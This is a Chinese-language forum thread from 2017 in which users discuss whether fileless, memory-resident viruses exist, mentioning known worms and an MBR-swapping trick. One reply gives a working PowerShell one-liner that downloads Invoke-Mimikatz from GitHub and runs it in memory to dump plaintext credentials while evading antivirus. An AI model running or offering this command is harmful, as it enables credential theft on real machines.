不知道有没存在于内存中的病毒,如果有怎么样清楚呢?
不知道有没有人遇到过?
This topic created in 3204 days ago, the information mentioned may be changed or developed.
 |
1
UnisandK Aug 30, 2017
拔电源
|
 |
2
ZakaryTime Aug 30, 2017 via Android
这种病毒的意义在哪?存活概率为 0
|
 |
3
leloext Aug 30, 2017
Worm.NetKiller2003 就是内存病毒,无生成文件。
|
 |
4
ic2y Aug 30, 2017  1
有这种毒。忘记叫什么了。 平时运行在内存,无文件,劫持关机操作,关机前的最后时刻,备份 MBR 引导,写入恶意 MBR,写入恶意程序。一旦开机运行,从 MBR 启动起来之后,立刻恢复正常 MRB,删除恶意程序。。
巧妙利用关机前,杀毒软件已经退出的间隙。 |
 |
5
anoymoux Aug 30, 2017
举个例子:Mimikatz 获取明文密码,如果直接下载执行会被杀软删除,用下面的命令就可以在内存中执行,无文件产生
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m" |
 |
7
claysec Aug 30, 2017
把 windows 系统刷进内存你就是无敌的金刚之身了。
|
 |
8
yksoft1 Aug 30, 2017
你说的内存条 SPD 里藏恶意代码,攻击 BIOS/EFI 之类?这个倒真的可以考虑一下。
一个病毒只存在于 RAM 中也是可以起到攻击作用的,至少完全可以盗取隐私机密数据。 |
 |
9
am241 Aug 30, 2017 via Android
SQL slammer
|
Select Language